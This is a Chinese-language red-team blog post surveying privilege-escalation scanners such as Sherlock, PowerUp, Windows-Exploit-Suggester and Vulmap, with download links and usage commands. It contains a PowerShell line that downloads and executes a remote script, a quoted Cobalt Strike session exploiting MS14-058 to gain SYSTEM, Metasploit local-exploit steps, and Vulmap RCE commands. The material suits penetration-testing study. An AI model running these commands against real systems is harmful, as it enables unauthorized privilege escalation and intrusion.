[ 红队知识库 ] Windows Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)
创始人
2025-05-29 02:43:02
0

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

  • 🍬 博主介绍
  • 一、使用Windows-Exploit-Suggester解析systeminfo
    • 1、简介
    • 2、下载地址:
    • 3、使用方式:
      • 1.安装xlrd包(注意python2、3版本的pip问题)
      • 2.获取对应的漏洞信息库(注意要使用python2来获取)
      • 3.生成要进行对比的靶机的系统信息
      • 4.使用windows-exploit-suggester.py来进行对比
  • 二、使用Linux-Exploit-Suggester.sh寻找linux提权问题
    • 1、简介
    • 2、下载地址:
    • 3、使用方式:
  • 三、使用Sherlock工具
    • 1、简介
    • 2、下载地址:
    • 3、使用方式:
      • 1.加载脚本
      • 2.发现漏洞
      • 3.验证漏洞
    • 4、使用实例:
  • 四、使用MSF查询补丁和可利用提权漏洞
    • 1、查询补丁
    • 2、查询Exp
    • 3、利用示例
  • 五、使用powerup检查提权漏洞
    • 1、简介
    • 2、下载地址
    • 3、使用方式
    • 4、注意
  • 六、accesschk.exe
    • 1、简介
    • 2、下载地址
    • 3、使用方式
      • 1.AccessChk常用参数:
      • 2.常用语句
      • 3.详细使用方式
  • 七、WindowsVulnScan
    • 1、简介
    • 2、下载地址:
    • 3、使用方式
      • 1.参数介绍
      • 2.使用方式
  • 八、gtfo
    • 1、简介
    • 2、下载地址
    • 3、使用方式
  • 九、Vulmap
    • 1、简介
    • 2、下载地址
    • 3、使用方式
  • 十、BeRoot
    • 1、简介
    • 2、下载地址
    • 3、使用方式
  • 十一、在线提权漏洞检测平台

一、使用Windows-Exploit-Suggester解析systeminfo

1、简介

Windows-Exploit-Suggester是受Linux_Exploit_Suggester的启发而开发的一款提权辅助工具,用python开发而成,通过比对systeminfo生成的文件,从而发现系统是否存在未修复漏洞。

2、下载地址:

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

3、使用方式:

1.安装xlrd包(注意python2、3版本的pip问题)

使用python2 的pip来安装xlrd包
命令:

python2 -m pip install xlrd==1.2.0

在这里插入图片描述

安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。所以pandas.read_excel(‘xxx.xlsx’)会报错。

在这里插入图片描述

2.获取对应的漏洞信息库(注意要使用python2来获取)

python2 windows-exploit-suggester.py --update

在这里插入图片描述

成功后会生成一个xls表格文件

在这里插入图片描述

3.生成要进行对比的靶机的系统信息

systeminfo > systeminfo_win10.txt 

在对应的靶机上运行该命令把靶机安装不到情况写入systeminfo_win10.txt文件中

在这里插入图片描述

4.使用windows-exploit-suggester.py来进行对比

python2 windows-exploit-suggester.py --database 2023-03-07-mssb.xls --systeminfo systeminfo_win10.txt

在这里插入图片描述

二、使用Linux-Exploit-Suggester.sh寻找linux提权问题

1、简介

Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具

2、下载地址:

https://github.com/mzet-/linux-exploit-suggester

3、使用方式:

./linux-exploit-suggester.sh

在这里插入图片描述

三、使用Sherlock工具

1、简介

Sherlock是一个在Windows下用于本地提权的PowerShell脚本。
目前包含了以下漏洞:

MS10-015 : User Mode to Ring (KiTrap0D)
MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k
MS15-078 : Font Driver Buffer Overflow
MS16-016 : ‘mrxdav.sys’ WebDAV
MS16-032 : Secondary Logon Handle

2、下载地址:

https://github.com/rasta-mouse/Sherlock

3、使用方式:

1.加载脚本

本地加载脚本

Import-Module Sherlock.ps1 

远程加载脚本

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

2.发现漏洞

Find-AllVulns

在这里插入图片描述

Appears Vulnerable就是存在漏洞

3.验证漏洞

elevate ms14-058 smb

在这里插入图片描述
在这里插入图片描述

4、使用实例:

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rastabeacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytesbeacon> powershell Find-MS14058
[*] Tasked beacon to run: Find-MS14058
[+] host called home, sent: 20 bytes
[+] received output:Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerablebeacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

四、使用MSF查询补丁和可利用提权漏洞

1、查询补丁

meterpreter> run post/windows/gather/enum_patches 
[+] KB2999226 installed on 11/25/2020 
[+] KB976902 installed on 11/21/2010 

2、查询Exp

msf> use post/multi/recon/local_exploit_suggester 
msf> set LHOST <攻击机IP> msf> set SESSION  msf> run 

3、利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION 
msf> run 
meterpreter> getuid 
Server username: NT AUTHORITY\SYSTEM

五、使用powerup检查提权漏洞

1、简介

PowerUp 所做的事是寻找可能存在弱点的地方,从而帮助提权。
利用 PowerUp 进行提权需要首先导入 ps1 文件powershell-import PowerUp.ps1,再执行powershell Invoke-AllChecks命令,使用 PowerUp 脚本可以快速的帮助我们发现系统弱点,从而实现提权的目的。

2、下载地址

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

3、使用方式

执行以下命令:将 ps1 文件上传到目标主机,并执行所有弱点检查。

powershell-import PowerUp.ps1 
powershell invoke-allchecks

在这里插入图片描述

4、注意

1、如果在自己的靶机上发现导入ps1文件失败,这可能是因为系统不允许执行不信任的脚本文件导致的。
这时为了复现成功可以来到靶机下,以管理员权限打开 Powershell,运行set-ExecutionPolicy RemoteSigned,输入Y回车,此时系统便能导入PowerUp.ps1文件了。
如果是真实环境执行不了那就只能换工具了。
2、在运行Invoke-AllChecks后,便会列出当前系统中可被提权的弱点之处,之后再执行检查结果中AbuseFunction下的命令便能开始提权操作了。

六、accesschk.exe

1、简介

AccessChk是微软提供的一款安全检查工具,是Sysintenals集合中的一款工具,使用它可以对Windows系统中的一些系统文件、服务、注册表等进行管理和维护排查等功能,可以很直观清晰的发现系统资源存在的缺陷,对其进行提权等,所以往往会被攻击者利用。

2、下载地址

英文版本:

http://technet.microsoft.com/en-us/sysinternals/bb664922

中文版本:

http://technet.microsoft.com/ZH-cn/sysinternals/bb664922

3、使用方式

1.AccessChk常用参数:

-c Name是服务名称,如spooler
-d 仅处理目录,或最高级的
-k Name是注册表项
-n 仅显示没有访问权限的对象
-p Name是进程或进程PID,例如svchost.exe
-r 仅显示具有读取访问权限的对象
-s 递归
-v 显示详细信息
-w 仅显示具有写入访问权限的对象

2.常用语句

查看所有用户在d盘dir路径的子路径的权限 
accesschk "d:\dir" 
查看Administrator用户在d盘dir路径的子路径的权限 
accesschk "Administrator "d:\dir" 
查看Administrators组对所有服务的权限 
accesschk Administrators -c * 
查看Guest用户对hklm\software注册表的权限 
accesschk -k Guest hklm\software 
查看User用户对全局对象的权限
accesschk -ou User 

3.详细使用方式

https://learn.microsoft.com/zh-cn/sysinternals/downloads/accesschk

七、WindowsVulnScan

查找主机上具有的CVE,查找具有公开EXP的CVE的Python脚本

1、简介

WindowsVulnScan是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。
本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。

2、下载地址:

https://github.com/chroblert/WindowsVulnScan

3、使用方式

1.参数介绍

可选参数:-h, --help            show this help message and exit-u, --update-cve      更新CVEKB数据-U, --update-exp      更新CVEEXP数据-m MODE, --mode MODE  搭配-U使用。更新模式 All:更新所有;Empty:只更新空白的;Error:只更新之前未成功更新的-C, --check-EXP       检索具有EXP的CVE-n PRODUCTNAME, --productName PRODUCTNAME搭配-C使用。自定义产品名称,如Windows 10-N PRODUCTVERSION, --productVersion PRODUCTVERSION搭配-C使用。自定义产品版本,如20H2-f FILE, --file FILE  ps1脚本运行后产生的.json文件

2.使用方式

1. 首先运行powershell脚本KBCollect.ps收集一些信息
.\KBCollect.ps1 
2. 将运行后产生的KB.json文件移动到cve-check.py所在的目录
3. 安装一些python3模块
python3 -m pip install requirements.txt 
4. 运行cve-check.py -u创建CVEKB数据库
5. 运行cve-check.py -U更新CVEKB数据库中的hasPOC字段
cve-check.py -u 此处可以使用-m选择更新模式。-m All:更新所有-m Empty:只更新hasPOC字段为空的-m Error:只更新hasPOC字段为Error的
6. 运行cve-check.py -C -f KB.json查看具有公开EXP的CVE,如下:
cve-check.py -C -f KB.json
7. 若使用脚本扫描到的系统名称和版本不准确,可以使用-n,-N进行指定

八、gtfo

1、简介

特征。该工具的唯一功能是让您能够从终端中搜索gtfobins和lolbas。
GTFOBins:Linux命令提权辅助查询

https://gtfobins.github.io/

LOLBAS:Windows命令提权辅助查询

https://lolbas-project.github.io/

2、下载地址

https://github.com/mzfr/gtfo

3、使用方式

https://github.com/mzfr/gtfo

九、Vulmap

1、简介

Vulmap是一款漏洞扫描工具, 可对Web容器、Web服务器、Web中间件以及CMS等Web程序进行漏洞扫描, 并且具备漏洞利用功能。 相关测试人员可以使用vulmap检测目标是否存在特定漏洞, 并且可以使用漏洞利用功能验证漏洞是否真实存在。

2、下载地址

https://github.com/vulmon/Vulmap

安装依赖:

pip3 install -r requirements.txt

3、使用方式

测试所有漏洞poc
python3 vulmap.py -u http://testphp.vulnweb.com
RCE漏洞使用id命令
python3 vulmap.py -u http://example.com -c "id"
指定web容器 -a参数
python3 vulmap.py -u http://example.com -a struts2
指定模式 -m参数
python3 vulmap.py -u http://example.com -m poc -a struts2
指定漏洞 -v参数
python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729
批量扫描URL -f参数
python3 vulmap.py -f scan_list.txt
导出扫描结果 -o参数
python3 vulmap.py -u http://example.com -o result.txt
详细使用可参考:
https://blog.csdn.net/qq_45924653/article/details/109022892

十、BeRoot

1、简介

BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法。其二进制编译地址为:

https://github.com/AlessandroZ/BeRoot/releases

它将作为后开发模块被添加到pupy(Pupy是一个开源,跨平台(Windows,Linux,OSX,Android),多功能RAT远程管理工具和后开发工具,主要用python编写)项目中(因此它将在内存中执行,而不会在硬盘中执行)。
需要注意的是,这款工具只能用来检测,而无法直接利用目标系统中存在的漏洞。但是,如果它发现了错误配置,它可以通过模版来利用这些漏洞。模版文件位于templates/service目录下,如果项目提供的模版文件无法运行,我们也可以根据目标系统的情况手动创建一个模版文件。

2、下载地址

https://github.com/AlessandroZ/BeRoot

3、使用方式

https://www.cnblogs.com/backlion/p/7325144.html

在这里插入图片描述

十一、在线提权漏洞检测平台

极光无限出品的安全扫描仪,在提权方面,基于其强大的安全检测能力,能够给出专业的修复建议,有效验证和加固网络资产漏洞。
查询地址:

https://detect.secwx.com/

在这里插入图片描述

相关内容

热门资讯

扫房神器2安卓系统,打造洁净家... 你有没有发现,家里的灰尘就像小精灵一样,总是悄悄地在你不注意的时候跳出来?别急,今天我要给你介绍一个...
安卓完整的系统设置,全面掌控手... 亲爱的手机控们,是不是觉得你的安卓手机用久了,功能越来越强大,但设置却越来越复杂?别急,今天就来带你...
电视安卓系统是几代机子,揭秘新... 你有没有想过,家里的电视是不是已经升级到了最新的安卓系统呢?别小看了这个小小的系统升级,它可是能让你...
安卓系统隐私有经常去,系统级防... 你知道吗?在咱们这个数字化时代,手机可是我们生活中不可或缺的好伙伴。但是,你知道吗?这个好伙伴有时候...
安卓10系统断网软件,轻松实现... 你有没有遇到过这种情况?手机突然断网了,明明信号满格,却连不上网,急得你团团转。别急,今天就来给你揭...
安卓可以改什么系统版本,体验全... 你有没有想过,你的安卓手机其实可以像换衣服一样,换一个全新的“系统版本”呢?没错,这就是今天我们要聊...
最好的平板游戏安卓系统,畅享指... 亲爱的游戏迷们,你是否在寻找一款能够让你在安卓平板上畅玩无忧的游戏神器?别急,今天我就要给你揭秘,究...
华为安卓系统卡顿解决,华为安卓... 你是不是也遇到了华为安卓系统卡顿的问题?别急,今天就来给你支几招,让你的华为手机重新焕发活力!一、清...
安卓建议升级鸿蒙系统吗,探讨鸿... 亲爱的安卓用户们,最近是不是被鸿蒙系统的新鲜劲儿给吸引了?是不是在犹豫要不要把你的安卓手机升级成鸿蒙...
安卓如何变苹果系统桌面,桌面系... 你有没有想过,把你的安卓手机变成苹果系统桌面,是不是瞬间高大上了呢?想象那流畅的动画效果,那简洁的界...
windows平板安卓系统升级... 你有没有发现,最近你的Windows平板电脑突然变得有些不一样了?没错,就是那个一直默默陪伴你的小家...
安卓系统扩大运行内存,解锁更大... 你知道吗?在科技飞速发展的今天,手机已经成为了我们生活中不可或缺的好伙伴。而手机中,安卓系统更是以其...
安卓系统怎么改变zenly,探... 你有没有发现,你的安卓手机上的Zenly应用最近好像变得不一样了?没错,安卓系统的大手笔更新,让Ze...
英特尔安卓子系统,引领高效移动... 你有没有想过,手机里的安卓系统竟然也能和电脑上的英特尔处理器完美结合呢?这可不是天方夜谭,而是科技发...
永远会用安卓系统的手机,探索安... 亲爱的手机控们,你是否也有那么一款手机,它陪伴你度过了无数个日夜,成为了你生活中不可或缺的一部分?没...
有哪些安卓手机系统好用,好用系... 你有没有发现,现在手机市场上安卓手机的品牌和型号真是琳琅满目,让人挑花了眼?不过别急,今天我就来给你...
卡片记账安卓系统有吗,便捷财务... 你有没有想过,用手机记账是不是比拿着小本本记录来得方便多了?现在,手机上的应用层出不穷,那么,有没有...
武汉摩尔影城安卓系统APP,便... 你有没有想过,一部手机就能带你走进电影的世界,享受大屏幕带来的震撼?今天,就让我带你详细了解武汉摩尔...
联想刷安卓p系统,畅享智能新体... 你有没有发现,最近联想的安卓P系统刷机热潮可是席卷了整个互联网圈呢!这不,我就迫不及待地来和你聊聊这...
mac从安卓系统改成双系统,双... 你有没有想过,你的Mac电脑从安卓系统改成双系统后,生活会有哪些翻天覆地的变化呢?想象一边是流畅的苹...